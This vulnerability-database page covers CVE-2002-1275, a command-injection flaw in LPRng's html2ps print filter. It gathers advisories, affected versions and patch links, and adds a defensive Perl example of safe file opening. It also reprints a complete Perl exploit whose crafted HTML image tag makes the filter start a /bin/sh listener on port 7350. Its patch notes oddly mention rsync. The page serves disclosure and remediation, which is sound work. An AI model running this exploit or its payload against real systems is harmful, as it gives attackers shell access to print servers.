CVE-2002-1275
CVSS 7.5
Published: 2002-11-12 00:00:00
Revised: 2012-10-11 00:00:00

[Original] Unknown vulnerability in html2ps HTML/PostScript converter 1.0, when used within LPRng, allows remote attackers to execute arbitrary code via "unsanitized input."


[CNNVD] LPRng html2ps Remote Command Execution Vulnerability (CNNVD-200211-019)

        
        LPRng is an enhanced, extended and portable implementation of the Berkeley LPR print spooling system that runs on many operating systems.
        The html2ps filter shipped with LPRng has a flaw that lets a remote attacker execute arbitrary commands on the system with the privileges of the 'lp' user.
        The html2ps filter is installed by default as part of the LPRng print system; an unspecified vulnerability in it allows remote attackers to execute arbitrary commands with 'lp' user privileges.
        The details of the vulnerability are not yet known.
        Link: http://www.suse.com/de/security/2002_040_lprng_html2ps.html

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:html2ps_project:html2ps:1.0:b3
cpe:/a:html2ps_project:html2ps:1.0:b2
cpe:/a:html2ps_project:html2ps:1.0:b1
cpe:/a:html2ps_project:html2ps:1.0:b4
cpe:/a:html2ps_project:html2ps:1.0:b6
cpe:/a:html2ps_project:html2ps:1.0:b7
cpe:/a:html2ps_project:html2ps:1.0:b5

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1275
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1275
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200211-019
(official data source) CNNVD

- Other links and resources

http://www.debian.org/security/2002/dsa-192
(VENDOR_ADVISORY)  DEBIAN  DSA-192
http://www.securityfocus.com/bid/6079
(UNKNOWN)  BID  6079
http://www.novell.com/linux/security/advisories/2002_040_lprng_html2ps.html
(UNKNOWN)  SUSE  SuSE-SA:2002:040
http://www.iss.net/security_center/static/10526.php
(VENDOR_ADVISORY)  XF  lprng-html2ps-command-execution(10526)

- Vulnerability information

LPRng html2ps Remote Command Execution Vulnerability
Severity: High   Type: Input validation
Published: 2002-11-12 00:00:00   Updated: 2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * SUSE recommends uninstalling the html2ps package.
        * Configure access control rules correctly in /etc/lpd.perms by adding:
        DEFAULT REJECT
        to reject access from any external network user.
        Vendor patch:
        S.u.S.E.
        --------
        S.u.S.E. has released a security advisory (SuSE-SA:2002:040) and corresponding patches for this issue:
        SuSE-SA:2002:040: lprng, html2ps: local privilege escalation, remote command execution
        Link:
        http://www.suse.com/de/security/2002_040_lprng_html2ps.html

        Patch downloads:
        i386 Intel Platform:
        SuSE-8.1
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/html2ps-1.0b3-458.i586.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/html2ps-1.0b3-458.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/lpdfilter-0.43-63.i586.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/lpdfilter-0.43-63.src.rpm
        SuSE-8.0
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra1/html2ps-1.0b3-456.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/html2ps-1.0b3-456.src.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap1/lpdfilter-0.42-155.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/lpdfilter-0.42-155.src.rpm
        SuSE-7.3
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/gra1/html2ps-1.0b3-457.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/html2ps-1.0b3-457.src.rpm
        SuSE-7.2
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/gra1/html2ps-1.0b1-432.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/html2ps-1.0b1-432.src.rpm
        SuSE-7.1
        ftp://ftp.suse.com/pub/suse/i386/update/7.1/gra1/html2ps-1.0b1-431.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/html2ps-1.0b1-431.src.rpm
        SuSE-7.0
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/gra1/html2ps-1.0b1-428.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/html2ps-1.0b1-428.src.rpm
        Sparc Platform:
        SuSE-7.3
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/gra1/html2ps-1.0b3-88.sparc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/html2ps-1.0b3-88.src.rpm
        AXP Alpha Platform:
        SuSE-7.0
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/gra1/html2ps-1.0b1-328.alpha.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/html2ps-1.0b1-328.src.rpm
        PPC Power PC Platform:
        SuSE-7.1
        ftp://ftp.suse.com/pub/suse/ppc/update/7.1/gra1/html2ps-1.0b1-303.ppc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/html2ps-1.0b1-303.src.rpm
        SuSE-7.0
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/gra1/html2ps-1.0b1-302.ppc.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/html2ps-1.0b1-302.src.rpm
        Patch installation:
        Install the file with "rpm -Fhv file.rpm". Afterwards, if the rsync service is started from inetd, send a signal to the inetd process to restart it; if rsync is started with "rsync --daemon", run that command again to restart the rsync service.

- Vulnerability information (21974)

LPRNG html2ps 1.0 Remote Command Execution Vulnerability (EDBID:21974)
Platform: unix   Type: remote
2002-10-31   Verified
Author: Sebastian Krahmer
source: http://www.securityfocus.com/bid/6079/info

A vulnerability has been discovered in the html2ps filter which is included in the lprng print system.

It has been reported that it is possible for a remote attacker to execute arbitrary commands. The attacker must reportedly already have access to the 'lp' (or equivalent) account to exploit this condition.

The cause of this vulnerability is that html2ps may open files using unsanitized input that may be supplied by a potentially malicious user.

#!/usr/bin/perl -W

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printer names etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls print filters as any
# other print-spooling system does. It calls them with the UID of lp,
# that's why you get an lp-user shell later. The html2ps filter, which is
# a perl script, is called to convert the evil.html to .ps.
# However, there it breaks because html2ps calls the open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. That's all. :)


sub usage
{
	print "\n$0 <printhost> <remote-host>\n".
	      "\tprinthost   -- name of printer in /etc/printcap\n".
	      "\tremote-host -- IP or hostname of host where shell appears\n".
	      "'$0 lp 127.0.0.1' is recommended for everyones own machine\n\n";
	exit;
}


my $printhost = shift || usage();
my $remote = shift || usage();

print "Constructing evil.html ...\n";

open O, ">evil.html" or die $!;
print O <<"__eof__";
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__

close O;

if (fork() == 0) {
	exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);
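The exploit comment above points at the root cause: a Perl two-argument open() on a name taken from the submitted HTML. As an added illustration (not code from html2ps, LPRng, the advisory or the exploit author), the following Perl shows why that form is unsafe and how a print filter should open a file named by untrusted input instead. It goes slightly beyond the page's case by also refusing traversal and absolute paths; the function name, the image directory and the sample SRC values are all constructed for this example.

```perl
#!/usr/bin/perl
# Added example, not code from html2ps, LPRng or the advisory. It shows the
# Perl open() misuse the exploit comment refers to and the hardened form a
# print filter should use. Function and file names are hypothetical.
use strict;
use warnings;
use File::Spec;

# Hazard: the two-argument form, open(FH, $name), treats the name as a
# "magic" open specification. A leading or trailing '|' makes Perl run the
# rest as a shell command, '<', '>', '>>' and '+<' select modes, and
# surrounding whitespace is stripped. When $name comes from an <IMG SRC=...>
# attribute in a submitted document, the document author chooses the command.
# That call is deliberately not made anywhere in this file.

# Hardened: validate the SRC value, confine it to one directory, and use the
# three-argument open with an explicit mode so the name is only ever a path.
sub open_image_safely {
    my ($src, $image_dir) = @_;

    # Only plain relative names built from a conservative character set;
    # the first character may not be '|', '<', '>', '/', '.' or whitespace.
    return (undef, "rejected: unsafe characters in SRC")
        unless defined $src && $src =~ m{\A[A-Za-z0-9_][A-Za-z0-9_./-]*\z};

    # No '..' segments anywhere, so the name cannot escape $image_dir.
    return (undef, "rejected: parent-directory segment")
        if grep { $_ eq '..' } split m{/}, $src;

    my $path = File::Spec->catfile($image_dir, $src);

    # Three-argument open: '<' is the mode, $path is never parsed for '|' or '>'.
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    return ($fh, undef);
}

# Constructed inputs mirroring the shapes a filter may receive.
my $image_dir = File::Spec->tmpdir;
my @cases = (
    'logo.png',              # ordinary relative name: opened as a plain path
    '|true',                 # pipe-style name: must be refused, never run
    '../../etc/passwd',      # traversal attempt
    'img/../../secret',      # traversal hidden after a normal first segment
    '/etc/passwd',           # absolute path
    '>scratch.ps',           # would select write mode under two-argument open
);

for my $src (@cases) {
    my ($fh, $err) = open_image_safely($src, $image_dir);
    if ($fh) {
        print "accepted '$src': opened for reading\n";
        close $fh;
    } else {
        print "'$src': $err\n";
    }
}
```

Running it prints one line per case; only 'logo.png' reaches open(), and even that is attempted strictly as a file path under the image directory (it reports "open failed" if no such file exists), while every other name is refused by the validation step before any system call is made.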



		

- Vulnerability information

3813
IRIX html2ps Arbitrary Code Execution
Loss of Integrity

- Vulnerability description

IRIX contains a flaw that may allow a malicious user to run commands as the lp user. The issue is triggered when unsanitized input is passed to html2ps. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2004-01-30 2004-01-30
Unknown Unknown

- Solution

Currently, there are no known workarounds to correct this issue. However, SGI has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

LPRNG html2ps Remote Command Execution Vulnerability
Class: Input Validation Error   Bugtraq ID: 6079
Remote: Yes   Local: Yes
Published: 2002-10-31 12:00:00   Updated: 2009-07-11 06:06:00
Credit: Vulnerability announced in a SuSE advisory.

- Affected program versions

SGI IRIX 6.5.22
SGI IRIX 6.5.21 m
SGI IRIX 6.5.21 f
SGI IRIX 6.5.20 m
SGI IRIX 6.5.20 f
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
S.u.S.E. Linux 7.3
S.u.S.E. Linux 7.2
S.u.S.E. Linux 7.1
S.u.S.E. Linux 7.0
html2ps html2ps 1.0 b3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.3
html2ps html2ps 1.0 b2
html2ps html2ps 1.0 B1
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 7.0


- Exploit

Exploit code has been published:

- Solution

SGI has released advisory 20040104-01-P to address this issue. Patch 5424 will be released for IRIX versions later than 6.5.17. Users should upgrade to one of these versions and then apply the patch when it is available. Further details can be found in the attached advisory.

Fixes are available:


html2ps html2ps 1.0 b3

html2ps html2ps 1.0 B1

S.u.S.E. Linux 7.0

S.u.S.E. Linux 7.1

S.u.S.E. Linux 7.2

S.u.S.E. Linux 7.3

S.u.S.E. Linux 8.0

S.u.S.E. Linux 8.1

- Related references